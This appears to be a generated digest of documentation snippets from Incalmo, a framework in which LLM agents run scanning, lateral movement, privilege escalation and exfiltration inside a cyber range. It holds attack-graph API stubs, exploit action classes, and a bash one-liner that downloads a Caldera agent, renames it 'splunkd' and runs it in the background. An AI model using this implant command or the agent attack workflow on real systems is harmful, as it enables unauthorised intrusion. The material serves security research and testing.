### Create React App: Available Scripts Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/frontend/incalmo-ui/README.md Details the available npm scripts for a Create React App project, including starting the development server, running tests, building for production, and ejecting the configuration. ```bash npm start Runs the app in the development mode. Open http://localhost:3000 to view it in your browser. The page will reload when you make changes. You may also see any lint errors in the console. npm test Launches the test runner in the interactive watch mode. See the section about running tests for more information. npm run build Builds the app for production to the `build` folder. It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes. Your app is ready to be deployed! See the section about deployment for more information. npm run eject Note: this is a one-way operation. Once you `eject`, you can't go back! If you aren't satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you're on your own. You don't have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn't feel obligated to use this feature. However we understand that this tool wouldn't be useful if you couldn't customize it when you are ready for it. ``` -------------------------------- ### Copy Configuration Example Source: https://github.com/bsinger98/incalmo/blob/main/README.md Copies the example configuration file to a new file named config.json. This file should then be edited to customize Incalmo's settings. ```bash cp config/config_example.json config/config.json ``` -------------------------------- ### Install UI Dependencies Source: https://github.com/bsinger98/incalmo/blob/main/README.md Installs the necessary Node.js dependencies for the Incalmo web-based UI. This command should be run from the UI's frontend directory. ```bash cd frontend/incalmo-ui npm install ``` -------------------------------- ### Start Docker Development Environment Source: https://github.com/bsinger98/incalmo/blob/main/README.md Navigates to the docker directory and starts the necessary services using Docker Compose. This command brings up the required containers for Incalmo. ```bash cd docker docker compose up ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/incalmo/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/incalmo/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Start UI React Server Source: https://github.com/bsinger98/incalmo/blob/main/README.md Starts the React development server for the Incalmo UI. Once running, the UI will be accessible at http://localhost:3000. ```bash npm start ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_all/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_lateral_move/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_all/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_exfiltrate_data/pre_prompt.txt Demonstrates how to define and execute a query within the Incalmo framework. Queries are used to retrieve information from the environment state. Avoid 'print' statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Query Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/pre_prompt.txt Demonstrates how to structure a Python function to query the Incalmo environment state. Queries are used to retrieve information from the network and should be enclosed in tags. Avoid print statements as stdout is not provided. ```python async def query( environment_state_service, attack_graph_service, ): return environment_state_service.network.get_all_hosts() ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_lateral_move/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_exfiltrate_data/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The function should return a list containing all HighLevelActions to be executed. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(FindInformationOnAHost(host)) return actions ``` -------------------------------- ### Incalmo Basic Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/pre_prompt.txt Illustrates a basic Python action for the Incalmo framework. Actions are used to perform operations within the cyber range and must be enclosed in tags. The function should return a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/incalmo/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Set API Keys Source: https://github.com/bsinger98/incalmo/blob/main/README.md Copies the example environment file to .env. This file is used to store sensitive information such as LLM API keys required for Incalmo to function. ```bash cp .env.example .env ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_all/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_exfiltrate_data/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Network Scan Results Reporting Schema and Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/scan/scan_preprompt.txt Defines the Pydantic data models for structuring network scan results, including hosts and their open ports with associated CVEs. An example JSON output conforming to this schema is also provided. ```APIDOC class OpenPort(BaseModel): port: int service: str CVE: list[str] = [] class Host(BaseModel): ip: str open_ports: List[OpenPort] class ScanResults(BaseModel): results: List[Host] # Example Report Structure: { "results": [ { "ip": "192.168.1.100", "open_ports": [ { "port": 22, "service": "ssh", "CVE": ["CVE-2018-15473"] }, { "port": 80, "service": "http", "CVE": [] } ] }, { "ip": "10.0.0.5", "open_ports": [ { "port": 21, "service": "ftp", "CVE": ["CVE-2020-9054"] }, { "port": 3306, "service": "mysql", "CVE": [] } ] }, { "ip": "172.16.254.1", "open_ports": [] } ] } ``` -------------------------------- ### Incalmo Action Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_lateral_move/pre_prompt.txt Illustrates how to define and execute a single action in the Incalmo framework. Actions are used to perform operations within the cyber range. The framework expects a list of HighLevelActions. ```python async def action( environment_state_service, attack_graph_service, ): # Do something return [MyAction(...)] ``` -------------------------------- ### Execute Incalmo within Docker Source: https://github.com/bsinger98/incalmo/blob/main/README.md Attaches to the running attacker container and executes the main Python script (main.py) using uvicorn. This starts the Incalmo application. ```bash cd docker docker compose exec attacker /bin/bash uv run main.py ``` -------------------------------- ### Incalmo Multiple Actions Example Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/pre_prompt.txt Shows how to execute multiple actions sequentially within a single Incalmo action block. The action function collects desired operations into a list, which Incalmo then executes. Type annotations should be omitted as they can cause execution failures. ```python async def action( environment_state_service, attack_graph_service, ): actions = [] hosts = environment_state_service.network.get_all_hosts() for host in hosts: actions.append(DiscoverHostInformation(host)) return actions ``` -------------------------------- ### Status Report Pydantic Schema Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/find_information/preprompt.txt Defines the structure for reporting findings, including credentials and critical data paths, using a Pydantic model. This schema guides the format of the status report, which should be enclosed in `` tags. ```APIDOC class Credential(BaseModel): hostname: str host_ip: str username: str port: str class CriticalData(BaseModel): path: str class FindInformationResult(BaseModel): results: List[Credential | CriticalData] ``` -------------------------------- ### Execute Bash Command in Cyber Range Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/bash/pre_prompt.txt Demonstrates the correct method for submitting a single bash command for execution within the cyber range environment. Commands must be enclosed in specific tags and adhere to a one-line limit. ```bash ls -al ``` -------------------------------- ### Terminate Cyber Range Session Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/bash/pre_prompt.txt Provides the tag used to signal the end of the cybersecurity exercise or to indicate that the user is finished or has given up. This tag should be used when no further commands will be submitted. ```control ``` -------------------------------- ### Incalmo: Running Multiple Actions Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/no-services/pre_prompt.txt Illustrates how to execute multiple actions concurrently using the Incalmo framework. This involves iterating over a set of targets, creating an action for each, and returning them as a list. ```python async def action(): actions = [] ips = ['192.168.0.1', '192.168.0.1'] for ip in ips: actions.append(FindInformationOnHostWrapper(ip)) return actions ``` -------------------------------- ### Incalmo: Running a Single Action Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/no-services/pre_prompt.txt Demonstrates the basic structure for executing a single action within the Incalmo framework. Actions are defined within an asynchronous function and returned as a list. ```python async def action(): # Do something return [MyAction(...)] ``` -------------------------------- ### WgetFile: Download Files using Wget Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Represents an action to download files from the web using wget. It requires an agent and the URL of the file to download. ```python class WgetFile(LowLevelAction): """Downloads files from the web using wget.""" def __init__(self, agent: Agent, url: str): """Initializes the WgetFile action. Args: agent: The agent downloading the file. url: The URL of the file to download. """ pass ``` -------------------------------- ### Execute Bash Commands Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/privilege_escalation/preprompt.txt Demonstrates the syntax for executing bash commands by enclosing them within tags. This allows for direct execution of shell commands. ```bash ls -al ``` -------------------------------- ### Execute Python Scripts Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/privilege_escalation/preprompt.txt Illustrates how to execute Python scripts by wrapping the code within tags. Scripts are executed directly without arguments. ```python if __name__ == "__main__": print('Hello world') ``` -------------------------------- ### Execute Bash Command Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/find_information/preprompt.txt Demonstrates how to execute a single-line Bash command within the cyber range environment. Commands must be enclosed in `` tags for processing. ```bash ls -al ``` -------------------------------- ### AttackGraphService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/codebase.txt Handles the generation and management of attack paths within the simulated environment. ```python class AttackGraphService: # Handles the generation and management of attack paths def executed_attack_path(self, attack_path: AttackPath): """Records an executed attack path.""" pass def already_executed_attack_path(self, attack_path: AttackPath) -> bool: """Checks if an attack path has been executed before.""" pass def get_possible_targets_from_host(self, attacking_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths from a given host.""" pass def get_possible_attack_paths(self, attack_host: Host, target_host: Host, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths between two specific hosts.""" pass def get_attack_paths_to_target(self, target_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates attack paths to a specific target host.""" pass def find_hosts_with_credentials_to_host(self, target_host: Host) -> list[Host]: """Finds hosts that have credentials to access a target host.""" pass ``` -------------------------------- ### ListFilesInDirectory: List Files in Directory Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Allows an agent to list all files within a specified directory. Requires an agent and the target directory path. ```python class ListFilesInDirectory(LowLevelAction): """Lists all files in a specified directory.""" def __init__(self, agent: Agent, directory: str): """Initializes the ListFilesInDirectory action. Args: agent: The agent listing the files. directory: Directory path to list files from. """ pass ``` -------------------------------- ### EnvironmentStateService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/codebase.txt Manages the overall state of the simulated environment by processing various events and updating network and host information. It handles host discovery, service discovery, credential management, and infection tracking. ```python class EnvironmentStateService: """Manages the overall state of the simulated environment.""" def parse_events(self, events): """Processes various events to update the system state.""" pass def handle_HostsDiscovered(self, event: HostsDiscovered): """Updates the network with newly discovered hosts.""" pass def handle_ServicesDiscoveredOnHost(self, event: ServicesDiscoveredOnHost): """Updates host information with discovered services.""" pass def handle_CrendentialFound(self, event): """Processes newly found credentials.""" pass def handle_InfectedNewHost(self, event: InfectedNewHost): """Updates the system state when a new host is infected.""" pass def handle_CriticalDataFound(self, event: CriticalDataFound): """Records critical data found on hosts.""" pass def update_host_agents(self, trusted_agents: list[Agent]): """Updates the agents associated with each host.""" pass def add_infected_host(self, new_agent: Agent): """Adds a newly infected host to the network model.""" pass def log_infected_host_to_caldera(self, event: InfectedNewHost): """Logs infected host information to the Caldera framework.""" pass ``` -------------------------------- ### AttackGraphService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/codebase.txt Handles the generation and management of attack paths within the simulated environment, including checking execution status and finding potential targets. ```python class AttackGraphService: """Handles the generation and management of attack paths.""" def executed_attack_path(self, attack_path: AttackPath): """Records an executed attack path.""" pass def already_executed_attack_path(self, attack_path: AttackPath) -> bool: """Checks if an attack path has been executed before.""" pass def get_possible_targets_from_host(self, attacking_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths from a given host.""" pass def get_possible_attack_paths(self, attack_host: Host, target_host: Host, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths between two specific hosts.""" pass def get_attack_paths_to_target(self, target_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates attack paths to a specific target host.""" pass def find_hosts_with_credentials_to_host(self, target_host: Host) -> list[Host]: """Finds hosts that have credentials to access a target host.""" pass ``` -------------------------------- ### GetSudoVersion: Retrieve Sudo Utility Version Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Retrieves the version of the `sudo` utility on a target machine using the `sudo -V` command. Requires an agent. ```python class GetSudoVersion(LowLevelAction): """Retrieves the version of the sudo utility.""" def __init__(self, agent: Agent): """Initializes the GetSudoVersion action. Args: agent: The agent executing the command to retrieve the sudo version. Command: "sudo -V". Automatically set during initialization. """ pass ``` -------------------------------- ### SCPFile Action (Python) Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Allows an agent to securely copy files between hosts using SCP. This action requires the agent, SSH server details (IP, user, port), and source/destination file paths. ```Python class SCPFile(LowLevelAction) def __init__(self, agent: Agent, ssh_ip: str, ssh_user: str, ssh_port: str, src_filepath: str, dest_filepath: str) - agent: The agent performing the SCP. - ssh_ip: IP address of the SSH server. - ssh_user: SSH username. - ssh_port: Port for SSH connection. - src_filepath: Source file path. - dest_filepath: Destination file path. ``` -------------------------------- ### Download and Execute Caldera Agent (Linux) Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/privilege_escalation/preprompt.txt Downloads and executes the Caldera sandcat agent on a Linux system. This command requires a running Caldera server at the specified address and executes the agent in the background. ```bash cd ~; curl -s -X POST -H \'file:sandcat.go\' -H \'platform:linux\' $server/file/download > splunkd; chmod +x splunkd; ./splunkd -server $server -group red & ``` -------------------------------- ### EnvironmentStateService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/codebase.txt Manages the overall state of the simulated environment by processing various events and updating host information. ```python class EnvironmentStateService: # Manages the overall state of the simulated environment def parse_events(self, events): """Processes various events to update the system state.""" pass def handle_HostsDiscovered(self, event: HostsDiscovered): """Updates the network with newly discovered hosts.""" pass def handle_ServicesDiscoveredOnHost(self, event: ServicesDiscoveredOnHost): """Updates host information with discovered services.""" pass def handle_CrendentialFound(self, event): """Processes newly found credentials.""" pass def handle_InfectedNewHost(self, event: InfectedNewHost): """Updates the system state when a new host is infected.""" pass def handle_CriticalDataFound(self, event: CriticalDataFound): """Records critical data found on hosts.""" pass def update_host_agents(self, trusted_agents: list[Agent]): """Updates the agents associated with each host.""" pass def add_infected_host(self, new_agent: Agent): """Adds a newly infected host to the network model.""" pass def log_infected_host_to_caldera(self, event: InfectedNewHost): """Logs infected host information to the Caldera framework.""" pass ``` -------------------------------- ### ScanHost Action (Python) Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Represents an action to scan a specific host. It interacts with knowledge and planning services to gather and utilize information about the target host. Requires an agent and the target host's IP address. ```Python class ScanHost(LowLevelAction) def __init__(self, agent: Agent, host_ip: str) - agent: The agent performing the scan. - host_ip: The target host ip to be scanned. ``` -------------------------------- ### WriteableSudoersExploit: Exploit Writable Sudoers Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Initiates an exploit targeting writable `/etc/sudoers` configurations on a target machine. Requires an agent to execute the exploit. ```python class WriteableSudoersExploit(LowLevelAction): """Initiates an exploit targeting writable /etc/sudoers configurations.""" def __init__(self, agent: Agent): """Initializes the WriteableSudoersExploit action. Args: agent: The agent executing the writable sudoers exploit. """ pass ``` -------------------------------- ### EnvironmentStateService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/codebase.txt Manages the overall state of the simulated environment by processing various events and updating host information, credentials, and infection status. ```python class EnvironmentStateService: """Manages the overall state of the simulated environment.""" def parse_events(self, events): """Processes various events to update the system state.""" pass def handle_HostsDiscovered(self, event: HostsDiscovered): """Updates the network with newly discovered hosts.""" pass def handle_ServicesDiscoveredOnHost(self, event: ServicesDiscoveredOnHost): """Updates host information with discovered services.""" pass def handle_CrendentialFound(self, event): """Processes newly found credentials.""" pass def handle_InfectedNewHost(self, event: InfectedNewHost): """Updates the system state when a new host is infected.""" pass def handle_CriticalDataFound(self, event: CriticalDataFound): """Records critical data found on hosts.""" pass def update_host_agents(self, trusted_agents: list[Agent]): """Updates the agents associated with each host.""" pass def add_infected_host(self, new_agent: Agent): """Adds a newly infected host to the network model.""" pass def log_infected_host_to_caldera(self, event: InfectedNewHost): """Logs infected host information to the Caldera framework.""" pass ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_all/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### CopyFile: Copy File Between Locations Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Represents an action to copy a file from one location to another. Requires an agent, source file path, and destination file path. ```python class CopyFile(LowLevelAction): """Copies a file from one location to another.""" def __init__(self, agent: Agent, src_filepath: str, dest_filepath: str): """Initializes the CopyFile action. Args: agent: The agent copying the file. src_filepath: The source file path. dest_filepath: The destination file path. """ pass ``` -------------------------------- ### AttackPath and AttackTechnique Classes API Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Defines potential attack paths between hosts and the techniques used for these attacks. Includes properties for source, target, and attack method. ```APIDOC AttackPath: __init__(attack_host: Host, target_host: Host, attack_technique: AttackTechnique) Initializes an attack path. Parameters: attack_host: The Host object from which the attack originates. target_host: The Host object that is the target of the attack. attack_technique: An AttackTechnique object describing the method. Properties: attack_host: Host The source host of the attack. target_host: Host The target host of the attack. attack_technique: AttackTechnique The technique used for the attack. AttackTechnique: __init__(CredentialToUse: SSHCredential, PortToAttack: int) Initializes an attack technique. Parameters: CredentialToUse: The credential object to be used for the attack. PortToAttack: The port number targeted by the attack. ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_find_information/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### Host Class API Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/low-level-actions/codebase.txt Represents an individual host in the network, storing its properties, services, credentials, and agents. Supports service lookup and agent management. ```APIDOC Host: __init__(ip_address: str, hostname: str) Initializes a host with its IP address and hostname. Parameters: ip_address: The IP address of the host. hostname: The hostname of the host. Properties: ip_address: str The IP address of the host. hostname: str The hostname of the host. users: dict[str, str] A dictionary mapping usernames to passwords or other credentials. open_ports: dict[int, str] A dictionary mapping port numbers to service names running on those ports. ssh_config: list[SSHCredential] A list of SSHCredential objects associated with this host. critical_data_files: list[str] A list of file paths considered critical data on this host. agents: list[Agent] A list of Agent objects currently active on this host. infected: bool A flag indicating whether the host is currently infected. Methods: get_port_for_service(service: str) -> int | None Finds the port number associated with a given service name. Parameters: service: The name of the service (e.g., 'ssh', 'http'). has_service(service: str) -> bool Checks if a specific service is running on the host. Parameters: service: The name of the service to check. add_agent(agent: Agent) Adds an agent to the host and marks the host as infected. Parameters: agent: The Agent object to add. get_agent() -> Agent | None Returns a random agent from the host's list of agents, if any are present. ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/incalmo/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_lateral_move/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### EnvironmentStateService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_all/codebase.txt Manages the overall state of the simulated environment by processing various events and updating host information, credentials, and infection status. ```APIDOC EnvironmentStateService: parse_events(events) Processes various events to update the system state. handle_HostsDiscovered(event: HostsDiscovered) Updates the network with newly discovered hosts. handle_ServicesDiscoveredOnHost(event: ServicesDiscoveredOnHost) Updates host information with discovered services. handle_CrendentialFound(event) Processes newly found credentials. handle_InfectedNewHost(event: InfectedNewHost) Updates the system state when a new host is infected. handle_CriticalDataFound(event: CriticalDataFound) Records critical data found on hosts. update_host_agents(trusted_agents: list[Agent]) Updates the agents associated with each host. add_infected_host(new_agent: Agent) Adds a newly infected host to the network model. log_infected_host_to_caldera(event: InfectedNewHost) Logs infected host information to the Caldera framework. ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection 